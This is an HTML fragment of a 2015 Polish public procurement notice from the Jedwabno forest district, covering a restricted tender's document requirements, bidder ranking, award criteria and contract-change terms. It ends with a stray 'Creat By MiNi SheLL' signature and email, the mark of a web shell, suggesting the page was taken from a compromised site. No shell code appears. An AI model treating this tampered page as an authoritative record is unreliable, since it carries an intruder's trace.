</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie podmiotów oddających do dyspozycji Wykonawcy niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia (o treści odpowiadającej załącznikowi nr 6 do druku wniosku).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>Jeżeli liczba Wykonawców, którzy złożą wnioski o dopuszczenie do udziału w przetargu i spełniających wyżej wymienione warunki będzie większa niż 5, Zamawiający dokona rankingu Wykonawców, oceniając stopień spełnienia przez nich warunków udziału w postępowaniu na podstawie wykazu zamówień, zrealizowanych przez każdego z nich w ciągu ostatnich 5 lat (wg załącznika nr 5 do druku wniosku), popartego załączonymi poświadczeniami (referencjami) inwestorów, dla których były wykonywane (ewentualnie kopiami końcowych protokółów odbioru robót), potwierdzających, że roboty te wykonane zostały w sposób należyty. Zamawiający nie będzie brał pod uwagę robót, do których nie zostaną załączone dokumenty potwierdzające, że roboty te zostały wykonane należycie. Zamawiający dokona zsumowania wartości wszystkich wymienionych w wykazie robót o wartości min. 400 tys. zł netto (zarówno tych, które Wykonawca wymienił w wykazie na pozycji pierwszej, jak i pozostałych, wymienionych na kolejnych pozycjach wykazu lub w wykazie dodatkowym). Oceny punktowej, która kwalifikować będzie poszczególnych Wykonawców na kolejne miejsca w rankingu Wykonawców, Zamawiający dokona w oparciu o formułę matematyczną, określoną ilorazem wartości wszystkich wymienionych w wykazie robót o wartości powyżej 400 tys. zł netto danego Wykonawcy w stosunku do wartości wszystkich wziętych pod uwagę i wymienionych w wykazie robót (również o wartości powyżej 400 tys. zł netto) Wykonawcy, których sumaryczna wartość będzie największa. Do drugiego etapu postępowania zakwalifikowani zostaną ci Wykonawcy, którzy rankingu w tym zajmą w oparciu o uzyskaną liczbę punktów miejsca od 1 do 5.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres udzielonej gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić w przypadku, kiedy:
a) zmiany nie dotyczą treści oferty, na podstawie której dokonano wyboru wykonawcy,
b) zmiany są korzystne dla Zamawiającego, a konieczność ich wprowadzenia wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,
c) zmiany dotyczą przesunięcia terminu wykonania przedmiotu umowy ze względu na konieczność wykonania robót dodatkowych, których nie można było przewidzieć na etapie składania oferty i o ile nie jest możliwe równoległe wykonywanie tych robót z robotami podstawowymi,
d) zmiany dotyczą wprowadzenia lub zmiany podwykonawcy robót,
e) zmiany dotyczą zmiany wynagrodzenia w następstwie zmiany przepisów o podatku od towarów i usług (VAT),
f) zmiany dotyczą przedmiotu zamówienia i konieczność ich wprowadzenia jest skutkiem zmiany przepisów prawa. Zamawiający dopuszcza również możliwość zmiany ustaleń zawartej umowy stosunku do treści oferty Wykonawcy w zakresie:
a) terminu zakończenia realizacji robót na uzasadniony wniosek Wykonawcy pod warunkiem, że zmiana ta nie wynika z winy Wykonawcy, a spowodowana została warunkami pogodowymi utrudniającymi w znacznym stopniu lub uniemożliwiającymi  realizację przedmiotu zamówienia,
b) w uzasadnionym przypadku - zmiany kierownika budowy na innego, spełniającego również wymagania postawione w SIWZ,
c) innych istotnych zmian, wynikających ze zmiany przepisów prawa, jeżeli będą one miały wpływ na przedmiot zamówienia.
Składając pisemny wniosek o zmianę postanowień umowy, strona występująca o ich zmianę zobowiązana jest do udokumentowania zaistnienia choćby jednej z ww. okoliczności. Zmiana umowy może nastąpić wyłącznie w formie pisemnego aneksu do umowy pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_olsztyn/nadl_jedwabno (druk wniosku wraz z załącznikami)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> druk wniosku o dop. do udziału w postępowaniu + zał. - w Nadleśnictwie Jedwabno 12-122 Jedwabno ul. 1 Maja 3 lub na stronie internetowej http://bip.lasy.gov.pl/pl/bip/dg/rdlp_olsztyn/nadl_jedwabno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.11.2015 godzina 10:00, miejsce: sekretariat w siedzibie Zamawiającego (Nadleśnictwa Jedwabno) w Jedwabnie przy ul. 1 Maja 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com